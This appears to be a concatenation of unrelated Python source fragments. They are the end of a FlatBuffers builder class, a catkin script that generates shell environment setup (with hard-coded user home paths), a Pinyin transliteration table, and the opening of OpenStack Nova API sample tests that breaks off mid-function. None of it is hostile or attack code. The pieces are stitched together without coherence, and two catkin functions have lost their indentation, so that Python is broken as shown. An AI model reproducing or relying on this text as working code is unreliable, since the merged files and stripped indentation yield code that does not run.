        """Prepend a `byte` to the Builder buffer.
        Note: aligns and checks for space.
        """
        self.Prepend(N.Uint8Flags, x)
    def PrependUint8(self, x):
        """Prepend an `uint8` to the Builder buffer.
        Note: aligns and checks for space.
        """
        self.Prepend(N.Uint8Flags, x)
    def PrependUint16(self, x):
        """Prepend an `uint16` to the Builder buffer.
        Note: aligns and checks for space.
        """
        self.Prepend(N.Uint16Flags, x)
    def PrependUint32(self, x):
        """Prepend an `uint32` to the Builder buffer.
        Note: aligns and checks for space.
        """
        self.Prepend(N.Uint32Flags, x)
    def PrependUint64(self, x):
        """Prepend an `uint64` to the Builder buffer.
        Note: aligns and checks for space.
        """
        self.Prepend(N.Uint64Flags, x)
    def PrependInt8(self, x):
        """Prepend an `int8` to the Builder buffer.
        Note: aligns and checks for space.
        """
        self.Prepend(N.Int8Flags, x)
    def PrependInt16(self, x):
        """Prepend an `int16` to the Builder buffer.
        Note: aligns and checks for space.
        """
        self.Prepend(N.Int16Flags, x)
    def PrependInt32(self, x):
        """Prepend an `int32` to the Builder buffer.
        Note: aligns and checks for space.
        """
        self.Prepend(N.Int32Flags, x)
    def PrependInt64(self, x):
        """Prepend an `int64` to the Builder buffer.
        Note: aligns and checks for space.
        """
        self.Prepend(N.Int64Flags, x)
    def PrependFloat32(self, x):
        """Prepend a `float32` to the Builder buffer.
        Note: aligns and checks for space.
        """
        self.Prepend(N.Float32Flags, x)
    def PrependFloat64(self, x):
        """Prepend a `float64` to the Builder buffer.
        Note: aligns and checks for space.
        """
        self.Prepend(N.Float64Flags, x)
    ##############################################################
    ## @cond FLATBUFFERS_INTERNAL
    def PrependVOffsetT(self, x): self.Prepend(N.VOffsetTFlags, x)
    def Place(self, x, flags):
        """
        Place prepends a value specified by `flags` to the Builder,
        without checking for available space.
        """
        N.enforce_number(x, flags)
        self.head = self.head - flags.bytewidth
        encode.Write(flags.packer_type, self.Bytes, self.Head(), x)
    def PlaceVOffsetT(self, x):
        """PlaceVOffsetT prepends a VOffsetT to the Builder, without checking
        for space.
        """
        N.enforce_number(x, N.VOffsetTFlags)
        self.head = self.head - N.VOffsetTFlags.bytewidth
        encode.Write(packer.voffset, self.Bytes, self.Head(), x)
    def PlaceSOffsetT(self, x):
        """PlaceSOffsetT prepends a SOffsetT to the Builder, without checking
        for space.
        """
        N.enforce_number(x, N.SOffsetTFlags)
        self.head = self.head - N.SOffsetTFlags.bytewidth
        encode.Write(packer.soffset, self.Bytes, self.Head(), x)
    def PlaceUOffsetT(self, x):
        """PlaceUOffsetT prepends a UOffsetT to the Builder, without checking
        for space.
        """
        N.enforce_number(x, N.UOffsetTFlags)
        self.head = self.head - N.UOffsetTFlags.bytewidth
        encode.Write(packer.uoffset, self.Bytes, self.Head(), x)
    ## @endcond
## @cond FLATBUFFERS_INTERNAL
def vtableEqual(a, objectStart, b):
    """vtableEqual compares an unwritten vtable to a written vtable."""
    N.enforce_number(objectStart, N.UOffsetTFlags)
    if len(a) * N.VOffsetTFlags.bytewidth != len(b):
        return False
    for i, elem in enumerate(a):
        written = encode.Get(packer.voffset, b, i * N.VOffsetTFlags.bytewidth)
        # A pair of zeros means both sides use the default for this field.
        if written == 0 and elem == 0:
            continue
        if written != objectStart - elem:
            return False
    return True
## @endcond
## @}
| |
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Software License Agreement (BSD License)
#
# Copyright (c) 2012, Willow Garage, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Willow Garage, Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
'''This file generates shell code for the setup.SHELL scripts to set environment variables'''
from __future__ import print_function
import argparse
import copy
import errno
import os
import platform
import sys
# Marker file whose presence identifies a directory as a catkin workspace.
CATKIN_MARKER_FILE = '.catkin'
system = platform.system()
IS_DARWIN = (system == 'Darwin')
IS_WINDOWS = (system == 'Windows')
# subfolder of workspace prepended to CMAKE_PREFIX_PATH
# Maps environment variable name -> workspace subfolder(s) whose paths are
# prepended to that variable ('' means the workspace root itself).
ENV_VAR_SUBFOLDERS = {
    'CMAKE_PREFIX_PATH': '',
    'CPATH': 'include',
    'LD_LIBRARY_PATH' if not IS_DARWIN else 'DYLD_LIBRARY_PATH': ['lib', os.path.join('lib', 'x86_64-linux-gnu')],
    'PATH': 'bin',
    'PKG_CONFIG_PATH': [os.path.join('lib', 'pkgconfig'), os.path.join('lib', 'x86_64-linux-gnu', 'pkgconfig')],
    'PYTHONPATH': 'lib/python2.7/dist-packages',
}
def rollback_env_variables(environ, env_var_subfolders):
    '''
    Generate shell code that resets environment variables by unrolling
    modifications based on all workspaces in CMAKE_PREFIX_PATH.
    This does not cover modifications performed by environment hooks.
    '''
    lines = []
    unmodified_environ = copy.copy(environ)
    for key, subfolders in sorted(env_var_subfolders.items()):
        if not isinstance(subfolders, list):
            subfolders = [subfolders]
        for subfolder in subfolders:
            rolled_back = _rollback_env_variable(unmodified_environ, key, subfolder)
            if rolled_back is None:
                continue
            environ[key] = rolled_back
            lines.append(assignment(key, rolled_back))
    if lines:
        lines.insert(0, comment('reset environment variables by unrolling modifications based on all workspaces in CMAKE_PREFIX_PATH'))
    return lines
def _rollback_env_variable(environ, name, subfolder):
    '''
    For each catkin workspace in CMAKE_PREFIX_PATH remove the first entry from env[NAME] matching workspace + subfolder.
    :param subfolder: str '' or subfoldername that may start with '/'
    :returns: the updated value of the environment variable.
    '''
    current = environ.get(name, '')
    remaining = [p for p in current.split(os.pathsep) if p]
    modified = False
    if subfolder:
        # Strip at most one leading and one trailing path separator.
        if subfolder.startswith(os.path.sep) or (os.path.altsep and subfolder.startswith(os.path.altsep)):
            subfolder = subfolder[1:]
        if subfolder.endswith(os.path.sep) or (os.path.altsep and subfolder.endswith(os.path.altsep)):
            subfolder = subfolder[:-1]
    for ws_path in _get_workspaces(environ, include_fuerte=True, include_non_existing=True):
        path_to_find = os.path.join(ws_path, subfolder) if subfolder else ws_path
        path_to_remove = None
        for candidate in remaining:
            # Compare ignoring a single trailing separator on the entry.
            cleaned = candidate[:-1] if candidate and candidate[-1] in [os.path.sep, os.path.altsep] else candidate
            if cleaned == path_to_find:
                path_to_remove = candidate
                break
        if path_to_remove:
            remaining.remove(path_to_remove)
            modified = True
    return os.pathsep.join(remaining) if modified else None
def _get_workspaces(environ, include_fuerte=False, include_non_existing=False):
    '''
    Based on CMAKE_PREFIX_PATH return all catkin workspaces.
    :param include_fuerte: The flag if paths starting with '/opt/ros/fuerte' should be considered workspaces, ``bool``
    '''
    # get all cmake prefix paths
    paths = [p for p in environ.get('CMAKE_PREFIX_PATH', '').split(os.pathsep) if p]
    def _is_workspace(path):
        # A workspace carries the marker file; fuerte installs and (optionally)
        # not-yet-existing paths can be accepted as well.
        if os.path.isfile(os.path.join(path, CATKIN_MARKER_FILE)):
            return True
        if include_fuerte and path.startswith('/opt/ros/fuerte'):
            return True
        return bool(include_non_existing and not os.path.exists(path))
    return [path for path in paths if _is_workspace(path)]
def prepend_env_variables(environ, env_var_subfolders, workspaces):
    '''
    Generate shell code to prepend environment variables
    for the all workspaces.
    '''
    lines = [comment('prepend folders of workspaces to environment variables')]
    paths = [path for path in workspaces.split(os.pathsep) if path]
    # CMAKE_PREFIX_PATH is handled first, then the remaining keys in order.
    cmake_prefix = _prefix_env_variable(environ, 'CMAKE_PREFIX_PATH', paths, '')
    lines.append(prepend(environ, 'CMAKE_PREFIX_PATH', cmake_prefix))
    for key in sorted(k for k in env_var_subfolders if k != 'CMAKE_PREFIX_PATH'):
        prefix = _prefix_env_variable(environ, key, paths, env_var_subfolders[key])
        lines.append(prepend(environ, key, prefix))
    return lines
def _prefix_env_variable(environ, name, paths, subfolders):
'''
Return the prefix to prepend to the environment variable NAME, adding any path in NEW_PATHS_STR without creating duplicate or empty items.
'''
value = environ[name] if name in environ else ''
environ_paths = [path for path in value.split(os.pathsep) if path]
checked_paths = []
for path in paths:
if not isinstance(subfolders, list):
subfolders = [subfolders]
for subfolder in subfolders:
path_tmp = path
if subfolder:
path_tmp = os.path.join(path_tmp, subfolder)
# exclude any path already in env and any path we already added
if path_tmp not in environ_paths and path_tmp not in checked_paths:
checked_paths.append(path_tmp)
prefix_str = os.pathsep.join(checked_paths)
if prefix_str != '' and environ_paths:
prefix_str += os.pathsep
return prefix_str
def assignment(key, value):
    """Return a shell statement assigning `value` to `key` on this platform."""
    if IS_WINDOWS:
        return 'set %s=%s' % (key, value)
    return 'export %s="%s"' % (key, value)
def comment(msg):
    """Return `msg` formatted as a shell comment for this platform."""
    if IS_WINDOWS:
        return 'REM %s' % msg
    return '# %s' % msg
def prepend(environ, key, prefix):
    """Return shell code prepending `prefix` to `key`; falls back to a plain
    assignment when `key` is unset or empty in `environ`."""
    if key not in environ or not environ[key]:
        return assignment(key, prefix)
    if IS_WINDOWS:
        return 'set %s=%s%%%s%%' % (key, prefix, key)
    return 'export %s="%s$%s"' % (key, prefix, key)
def find_env_hooks(environ, cmake_prefix_path):
    '''
    Generate shell code with found environment hooks
    for the all workspaces.
    Hooks found in later (higher-priority) workspaces replace same-named
    hooks from earlier ones; generic (.sh/.bat) hooks are emitted before
    shell-specific ones.
    '''
    lines = []
    lines.append(comment('found environment hooks in workspaces'))
    generic_env_hooks = []
    generic_env_hooks_workspace = []
    specific_env_hooks = []
    specific_env_hooks_workspace = []
    # filename -> hook path, used to deduplicate hooks across workspaces
    generic_env_hooks_by_filename = {}
    specific_env_hooks_by_filename = {}
    generic_env_hook_ext = 'bat' if IS_WINDOWS else 'sh'
    specific_env_hook_ext = environ['CATKIN_SHELL'] if not IS_WINDOWS and 'CATKIN_SHELL' in environ and environ['CATKIN_SHELL'] else None
    # remove non-workspace paths
    workspaces = [path for path in cmake_prefix_path.split(os.pathsep) if path and os.path.isfile(os.path.join(path, CATKIN_MARKER_FILE))]
    # reversed so that hooks from earlier (higher-priority) workspaces win
    for workspace in reversed(workspaces):
        env_hook_dir = os.path.join(workspace, 'etc', 'catkin', 'profile.d')
        if os.path.isdir(env_hook_dir):
            for filename in sorted(os.listdir(env_hook_dir)):
                if filename.endswith('.%s' % generic_env_hook_ext):
                    # remove previous env hook with same name if present
                    if filename in generic_env_hooks_by_filename:
                        i = generic_env_hooks.index(generic_env_hooks_by_filename[filename])
                        generic_env_hooks.pop(i)
                        generic_env_hooks_workspace.pop(i)
                    # append env hook
                    generic_env_hooks.append(os.path.join(env_hook_dir, filename))
                    generic_env_hooks_workspace.append(workspace)
                    generic_env_hooks_by_filename[filename] = generic_env_hooks[-1]
                elif specific_env_hook_ext is not None and filename.endswith('.%s' % specific_env_hook_ext):
                    # remove previous env hook with same name if present
                    if filename in specific_env_hooks_by_filename:
                        i = specific_env_hooks.index(specific_env_hooks_by_filename[filename])
                        specific_env_hooks.pop(i)
                        specific_env_hooks_workspace.pop(i)
                    # append env hook
                    specific_env_hooks.append(os.path.join(env_hook_dir, filename))
                    specific_env_hooks_workspace.append(workspace)
                    specific_env_hooks_by_filename[filename] = specific_env_hooks[-1]
    env_hooks = generic_env_hooks + specific_env_hooks
    env_hooks_workspace = generic_env_hooks_workspace + specific_env_hooks_workspace
    count = len(env_hooks)
    lines.append(assignment('_CATKIN_ENVIRONMENT_HOOKS_COUNT', count))
    for i in range(count):
        lines.append(assignment('_CATKIN_ENVIRONMENT_HOOKS_%d' % i, env_hooks[i]))
        lines.append(assignment('_CATKIN_ENVIRONMENT_HOOKS_%d_WORKSPACE' % i, env_hooks_workspace[i]))
    return lines
def _parse_arguments(args=None):
parser = argparse.ArgumentParser(description='Generates code blocks for the setup.SHELL script.')
parser.add_argument('--extend', action='store_true', help='Skip unsetting previous environment variables to extend context')
return parser.parse_known_args(args=args)[0]
if __name__ == '__main__':
    try:
        try:
            args = _parse_arguments()
        except Exception as e:
            print(e, file=sys.stderr)
            sys.exit(1)
        # environment at generation time
        CMAKE_PREFIX_PATH = '/home/nicolas/objectorientation/devel;/home/gabriel/object-recogn/devel;/home/gabriel/catkin_ws/devel;/opt/ros/indigo'.split(';')
        # prepend current workspace if not already part of CPP
        base_path = os.path.dirname(__file__)
        if base_path not in CMAKE_PREFIX_PATH:
            CMAKE_PREFIX_PATH.insert(0, base_path)
        CMAKE_PREFIX_PATH = os.pathsep.join(CMAKE_PREFIX_PATH)
        environ = dict(os.environ)
        lines = []
        # unless --extend was given, first undo previous workspace changes
        if not args.extend:
            lines += rollback_env_variables(environ, ENV_VAR_SUBFOLDERS)
        lines += prepend_env_variables(environ, ENV_VAR_SUBFOLDERS, CMAKE_PREFIX_PATH)
        lines += find_env_hooks(environ, CMAKE_PREFIX_PATH)
        print('\n'.join(lines))
        # need to explicitly flush the output
        sys.stdout.flush()
    except IOError as e:
        # and catch potential "broken pipe" if stdout is not writable
        # which can happen when piping the output to a file but the disk is full
        if e.errno == errno.EPIPE:
            print(e, file=sys.stderr)
            sys.exit(2)
        raise
    sys.exit(0)
| |
# NOTE(review): appears to be a transliteration table mapping the 256 byte
# offsets 0x00-0xff of one Unicode block to Pinyin-style readings, with
# '[?] ' marking entries that have no reading — confirm against the
# package that indexes into this tuple.
data = (
    'Mou ',  # 0x00
    'Ye ',  # 0x01
    'Wei ',  # 0x02
    '[?] ',  # 0x03
    'Teng ',  # 0x04
    'Zou ',  # 0x05
    'Shan ',  # 0x06
    'Jian ',  # 0x07
    'Bo ',  # 0x08
    'Ku ',  # 0x09
    'Huang ',  # 0x0a
    'Huo ',  # 0x0b
    'Ge ',  # 0x0c
    'Ying ',  # 0x0d
    'Mi ',  # 0x0e
    'Xiao ',  # 0x0f
    'Mi ',  # 0x10
    'Xi ',  # 0x11
    'Qiang ',  # 0x12
    'Chen ',  # 0x13
    'Nue ',  # 0x14
    'Ti ',  # 0x15
    'Su ',  # 0x16
    'Bang ',  # 0x17
    'Chi ',  # 0x18
    'Qian ',  # 0x19
    'Shi ',  # 0x1a
    'Jiang ',  # 0x1b
    'Yuan ',  # 0x1c
    'Xie ',  # 0x1d
    'Xue ',  # 0x1e
    'Tao ',  # 0x1f
    'Yao ',  # 0x20
    'Yao ',  # 0x21
    '[?] ',  # 0x22
    'Yu ',  # 0x23
    'Biao ',  # 0x24
    'Cong ',  # 0x25
    'Qing ',  # 0x26
    'Li ',  # 0x27
    'Mo ',  # 0x28
    'Mo ',  # 0x29
    'Shang ',  # 0x2a
    'Zhe ',  # 0x2b
    'Miu ',  # 0x2c
    'Jian ',  # 0x2d
    'Ze ',  # 0x2e
    'Jie ',  # 0x2f
    'Lian ',  # 0x30
    'Lou ',  # 0x31
    'Can ',  # 0x32
    'Ou ',  # 0x33
    'Guan ',  # 0x34
    'Xi ',  # 0x35
    'Zhuo ',  # 0x36
    'Ao ',  # 0x37
    'Ao ',  # 0x38
    'Jin ',  # 0x39
    'Zhe ',  # 0x3a
    'Yi ',  # 0x3b
    'Hu ',  # 0x3c
    'Jiang ',  # 0x3d
    'Man ',  # 0x3e
    'Chao ',  # 0x3f
    'Han ',  # 0x40
    'Hua ',  # 0x41
    'Chan ',  # 0x42
    'Xu ',  # 0x43
    'Zeng ',  # 0x44
    'Se ',  # 0x45
    'Xi ',  # 0x46
    'She ',  # 0x47
    'Dui ',  # 0x48
    'Zheng ',  # 0x49
    'Nao ',  # 0x4a
    'Lan ',  # 0x4b
    'E ',  # 0x4c
    'Ying ',  # 0x4d
    'Jue ',  # 0x4e
    'Ji ',  # 0x4f
    'Zun ',  # 0x50
    'Jiao ',  # 0x51
    'Bo ',  # 0x52
    'Hui ',  # 0x53
    'Zhuan ',  # 0x54
    'Mu ',  # 0x55
    'Zen ',  # 0x56
    'Zha ',  # 0x57
    'Shi ',  # 0x58
    'Qiao ',  # 0x59
    'Tan ',  # 0x5a
    'Zen ',  # 0x5b
    'Pu ',  # 0x5c
    'Sheng ',  # 0x5d
    'Xuan ',  # 0x5e
    'Zao ',  # 0x5f
    'Tan ',  # 0x60
    'Dang ',  # 0x61
    'Sui ',  # 0x62
    'Qian ',  # 0x63
    'Ji ',  # 0x64
    'Jiao ',  # 0x65
    'Jing ',  # 0x66
    'Lian ',  # 0x67
    'Nou ',  # 0x68
    'Yi ',  # 0x69
    'Ai ',  # 0x6a
    'Zhan ',  # 0x6b
    'Pi ',  # 0x6c
    'Hui ',  # 0x6d
    'Hua ',  # 0x6e
    'Yi ',  # 0x6f
    'Yi ',  # 0x70
    'Shan ',  # 0x71
    'Rang ',  # 0x72
    'Nou ',  # 0x73
    'Qian ',  # 0x74
    'Zhui ',  # 0x75
    'Ta ',  # 0x76
    'Hu ',  # 0x77
    'Zhou ',  # 0x78
    'Hao ',  # 0x79
    'Ye ',  # 0x7a
    'Ying ',  # 0x7b
    'Jian ',  # 0x7c
    'Yu ',  # 0x7d
    'Jian ',  # 0x7e
    'Hui ',  # 0x7f
    'Du ',  # 0x80
    'Zhe ',  # 0x81
    'Xuan ',  # 0x82
    'Zan ',  # 0x83
    'Lei ',  # 0x84
    'Shen ',  # 0x85
    'Wei ',  # 0x86
    'Chan ',  # 0x87
    'Li ',  # 0x88
    'Yi ',  # 0x89
    'Bian ',  # 0x8a
    'Zhe ',  # 0x8b
    'Yan ',  # 0x8c
    'E ',  # 0x8d
    'Chou ',  # 0x8e
    'Wei ',  # 0x8f
    'Chou ',  # 0x90
    'Yao ',  # 0x91
    'Chan ',  # 0x92
    'Rang ',  # 0x93
    'Yin ',  # 0x94
    'Lan ',  # 0x95
    'Chen ',  # 0x96
    'Huo ',  # 0x97
    'Zhe ',  # 0x98
    'Huan ',  # 0x99
    'Zan ',  # 0x9a
    'Yi ',  # 0x9b
    'Dang ',  # 0x9c
    'Zhan ',  # 0x9d
    'Yan ',  # 0x9e
    'Du ',  # 0x9f
    'Yan ',  # 0xa0
    'Ji ',  # 0xa1
    'Ding ',  # 0xa2
    'Fu ',  # 0xa3
    'Ren ',  # 0xa4
    'Ji ',  # 0xa5
    'Jie ',  # 0xa6
    'Hong ',  # 0xa7
    'Tao ',  # 0xa8
    'Rang ',  # 0xa9
    'Shan ',  # 0xaa
    'Qi ',  # 0xab
    'Tuo ',  # 0xac
    'Xun ',  # 0xad
    'Yi ',  # 0xae
    'Xun ',  # 0xaf
    'Ji ',  # 0xb0
    'Ren ',  # 0xb1
    'Jiang ',  # 0xb2
    'Hui ',  # 0xb3
    'Ou ',  # 0xb4
    'Ju ',  # 0xb5
    'Ya ',  # 0xb6
    'Ne ',  # 0xb7
    'Xu ',  # 0xb8
    'E ',  # 0xb9
    'Lun ',  # 0xba
    'Xiong ',  # 0xbb
    'Song ',  # 0xbc
    'Feng ',  # 0xbd
    'She ',  # 0xbe
    'Fang ',  # 0xbf
    'Jue ',  # 0xc0
    'Zheng ',  # 0xc1
    'Gu ',  # 0xc2
    'He ',  # 0xc3
    'Ping ',  # 0xc4
    'Zu ',  # 0xc5
    'Shi ',  # 0xc6
    'Xiong ',  # 0xc7
    'Zha ',  # 0xc8
    'Su ',  # 0xc9
    'Zhen ',  # 0xca
    'Di ',  # 0xcb
    'Zou ',  # 0xcc
    'Ci ',  # 0xcd
    'Qu ',  # 0xce
    'Zhao ',  # 0xcf
    'Bi ',  # 0xd0
    'Yi ',  # 0xd1
    'Yi ',  # 0xd2
    'Kuang ',  # 0xd3
    'Lei ',  # 0xd4
    'Shi ',  # 0xd5
    'Gua ',  # 0xd6
    'Shi ',  # 0xd7
    'Jie ',  # 0xd8
    'Hui ',  # 0xd9
    'Cheng ',  # 0xda
    'Zhu ',  # 0xdb
    'Shen ',  # 0xdc
    'Hua ',  # 0xdd
    'Dan ',  # 0xde
    'Gou ',  # 0xdf
    'Quan ',  # 0xe0
    'Gui ',  # 0xe1
    'Xun ',  # 0xe2
    'Yi ',  # 0xe3
    'Zheng ',  # 0xe4
    'Gai ',  # 0xe5
    'Xiang ',  # 0xe6
    'Cha ',  # 0xe7
    'Hun ',  # 0xe8
    'Xu ',  # 0xe9
    'Zhou ',  # 0xea
    'Jie ',  # 0xeb
    'Wu ',  # 0xec
    'Yu ',  # 0xed
    'Qiao ',  # 0xee
    'Wu ',  # 0xef
    'Gao ',  # 0xf0
    'You ',  # 0xf1
    'Hui ',  # 0xf2
    'Kuang ',  # 0xf3
    'Shuo ',  # 0xf4
    'Song ',  # 0xf5
    'Ai ',  # 0xf6
    'Qing ',  # 0xf7
    'Zhu ',  # 0xf8
    'Zou ',  # 0xf9
    'Nuo ',  # 0xfa
    'Du ',  # 0xfb
    'Zhuo ',  # 0xfc
    'Fei ',  # 0xfd
    'Ke ',  # 0xfe
    'Wei ',  # 0xff
)
| |
# Copyright 2012 Nebula, Inc.
# Copyright 2013 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import inspect
import os
import uuid as uuid_lib
from oslo_config import cfg
from oslo_log import log as logging
from oslo_serialization import jsonutils
from oslo_utils import importutils
import testtools
from nova.api.metadata import password
# Import extensions to pull in osapi_compute_extension CONF option used below.
from nova.console import manager as console_manager # noqa - only for cfg
from nova.network.neutronv2 import api as neutron_api # noqa - only for cfg
from nova import test
from nova.tests.functional import api_samples_test_base
from nova.tests.functional import integrated_helpers
from nova.tests.unit.api.openstack import fakes
from nova.tests.unit import fake_network
from nova.tests.unit import fake_utils
from nova.tests.unit.image import fake
from nova.volume import cinder
CONF = cfg.CONF
# Import option definitions from the modules that register them so the
# self.flags(...) overrides used by the tests below can resolve the names.
CONF.import_opt('allow_resize_to_same_host', 'nova.compute.api')
CONF.import_opt('shelved_offload_time', 'nova.compute.manager')
CONF.import_opt('enable_network_quota',
                'nova.api.openstack.compute.contrib.os_tenant_networks')
CONF.import_opt('osapi_compute_extension',
                'nova.api.openstack.compute.extensions')
CONF.import_opt('osapi_compute_link_prefix', 'nova.api.openstack.common')
CONF.import_opt('osapi_glance_link_prefix', 'nova.api.openstack.common')
CONF.import_opt('enable', 'nova.cells.opts', group='cells')
CONF.import_opt('cell_type', 'nova.cells.opts', group='cells')
CONF.import_opt('db_check_interval', 'nova.cells.state', group='cells')

# Module-level logger for the sample tests.
LOG = logging.getLogger(__name__)
class ApiSampleTestBaseV2(api_samples_test_base.ApiSampleTestBase):
    """Base class for the v2 API sample tests.

    Subclasses may set ``extension_name`` (and optionally ``extends_name``)
    to load a single extension, or ``all_extensions`` to load them all.
    """
    _api_version = 'v2'

    def setUp(self):
        extends = []
        # NOTE: flags must be set before super().setUp() starts the API
        # services, otherwise the overrides would not take effect.
        self.flags(use_ipv6=False,
                   osapi_compute_link_prefix=self._get_host(),
                   osapi_glance_link_prefix=self._get_glance_host())
        if not self.all_extensions:
            if hasattr(self, 'extends_name'):
                extends = [self.extends_name]
            ext = [self.extension_name] if self.extension_name else []
            self.flags(osapi_compute_extension=ext + extends)
        super(ApiSampleTestBaseV2, self).setUp()
        self.useFixture(test.SampleNetworks(host=self.network.host))
        fake_network.stub_compute_with_ips(self.stubs)
        fake_utils.stub_out_utils_spawn_n(self.stubs)
        # Regenerate sample files instead of verifying when requested.
        self.generate_samples = os.getenv('GENERATE_SAMPLES') is not None
class ApiSamplesTrap(ApiSampleTestBaseV2):
    """Make sure extensions don't get added without tests."""
    all_extensions = True

    def _get_extensions_tested(self):
        """Return aliases of all extensions covered by a test class.

        Scans this module's globals for test classes deriving from
        _IntegratedTestBase that declare an ``extension_name`` and
        resolves each extension class to its alias.
        """
        tests = []
        for attr in globals().values():
            if not inspect.isclass(attr):
                continue  # Skip non-class objects
            if not issubclass(attr, integrated_helpers._IntegratedTestBase):
                continue  # Skip non-test classes
            if attr.extension_name is None:
                continue  # Skip base tests
            cls = importutils.import_class(attr.extension_name)
            tests.append(cls.alias)
        return tests

    def _get_extensions(self):
        """Return aliases of every extension the running API reports."""
        extensions = []
        response = self._do_get('extensions')
        for extension in jsonutils.loads(response.content)['extensions']:
            extensions.append(str(extension['alias']))
        return extensions

    def test_all_extensions_have_samples(self):
        # NOTE(danms): This is a list of extensions which are currently
        # in the tree but that don't (yet) have tests. This list should
        # NOT be allowed to grow, and should shrink to zero (and be
        # removed) soon.
        # TODO(gmann): skip this tests as merging of sample tests for v2
        # and v2.1 are in progress. After merging all tests, this tests
        # need to implement in different way.
        raise testtools.TestCase.skipException('Merging of v2 and v2.1 '
                                               'sample tests is in progress. '
                                               'This test will be enabled '
                                               'after all tests gets merged.')
        do_not_approve_additions = []
        do_not_approve_additions.append('os-create-server-ext')
        do_not_approve_additions.append('os-baremetal-ext-status')
        tests = self._get_extensions_tested()
        extensions = self._get_extensions()
        missing_tests = []
        for extension in extensions:
            # NOTE(danms): if you add tests, remove it from the
            # exclusions list
            self.assertFalse(extension in do_not_approve_additions and
                             extension in tests)
            # NOTE(danms): if you add an extension, it must come with
            # api_samples tests!
            if (extension not in tests and
                    extension not in do_not_approve_additions):
                missing_tests.append(extension)
        if missing_tests:
            # Fix: defer string interpolation to the logging framework
            # (lazy %-args) instead of formatting eagerly with '%'.
            LOG.error("Extensions are missing tests: %s", missing_tests)
        self.assertEqual(missing_tests, [])
class VersionsSampleJsonTest(ApiSampleTestBaseV2):
    """Sample tests for the API versions resource."""
    sample_dir = 'versions'

    def test_versions_get(self):
        # GET on the root resource lists the available API versions.
        resp = self._do_get('', strip_version=True)
        regexes = self._get_regexes()
        self._verify_response('versions-get-resp', regexes, resp, 200)
class ServersSampleBase(ApiSampleTestBaseV2):
    """Shared helper for sample tests that need a booted server."""

    def _post_server(self, use_common_server_api_samples=True):
        """Create a server via the API and verify the sample response.

        :param use_common_server_api_samples: when True (the default),
            _get_sample_path resolves the common server sample files for
            the POST request/response; pass False when a test needs
            extension-specific sample files.
        :returns: the result of _verify_response for the create request.
        """
        post_subs = {
            'image_id': fake.get_valid_image_id(),
            'host': self._get_host(),
        }
        saved_flag = self.__class__._use_common_server_api_samples
        try:
            self.__class__._use_common_server_api_samples = (
                use_common_server_api_samples)
            resp = self._do_post('servers', 'server-post-req', post_subs)
            regexes = self._get_regexes()
            return self._verify_response('server-post-resp', regexes,
                                         resp, 202)
        finally:
            # Always restore the class-level switch for later tests.
            self.__class__._use_common_server_api_samples = saved_flag
class ServersSampleMultiStatusJsonTest(ServersSampleBase):
    """Samples for listing servers filtered by multiple status values."""
    extension_name = '.'.join(('nova.api.openstack.compute.contrib',
                               'server_list_multi_status',
                               'Server_list_multi_status'))

    def test_servers_list(self):
        server_id = self._post_server()
        resp = self._do_get('servers?status=active&status=error')
        regexes = self._get_regexes()
        regexes['id'] = server_id
        self._verify_response('servers-list-resp', regexes, resp, 200)
class FlavorsSampleJsonTest(ApiSampleTestBaseV2):
    """Samples for the flavors resource."""
    sample_dir = 'flavors'

    def test_flavors_get(self):
        resp = self._do_get('flavors/1')
        self._verify_response('flavor-get-resp', self._get_regexes(),
                              resp, 200)

    def test_flavors_list(self):
        resp = self._do_get('flavors')
        self._verify_response('flavors-list-resp', self._get_regexes(),
                              resp, 200)
class FlavorsSampleAllExtensionJsonTest(FlavorsSampleJsonTest):
    # Re-run the flavors sample tests with every API extension enabled.
    all_extensions = True
class LimitsSampleJsonTest(ApiSampleTestBaseV2):
    """Samples for the limits resource."""
    sample_dir = 'limits'

    def test_limits_get(self):
        resp = self._do_get('limits')
        regexes = self._get_regexes()
        self._verify_response('limit-get-resp', regexes, resp, 200)
class KeyPairsSampleJsonTest(ApiSampleTestBaseV2):
    """Samples for the os-keypairs resource."""
    extension_name = "nova.api.openstack.compute.contrib.keypairs.Keypairs"

    def generalize_subs(self, subs, vanilla_regexes):
        # Loosen the keypair name so generated samples match any suffix.
        subs['keypair_name'] = 'keypair-[0-9a-f-]+'
        return subs

    def test_keypairs_post(self, public_key=None):
        """Get api sample of key pairs post request."""
        name = 'keypair-' + str(uuid_lib.uuid4())
        resp = self._do_post('os-keypairs', 'keypairs-post-req',
                             {'keypair_name': name})
        regexes = self._get_regexes()
        regexes['keypair_name'] = '(%s)' % name
        self._verify_response('keypairs-post-resp', regexes, resp, 200)
        # NOTE(maurosr): return the key_name is necessary cause the
        # verification returns the label of the last compared information in
        # the response, not necessarily the key name.
        return name

    def test_keypairs_import_key_post(self):
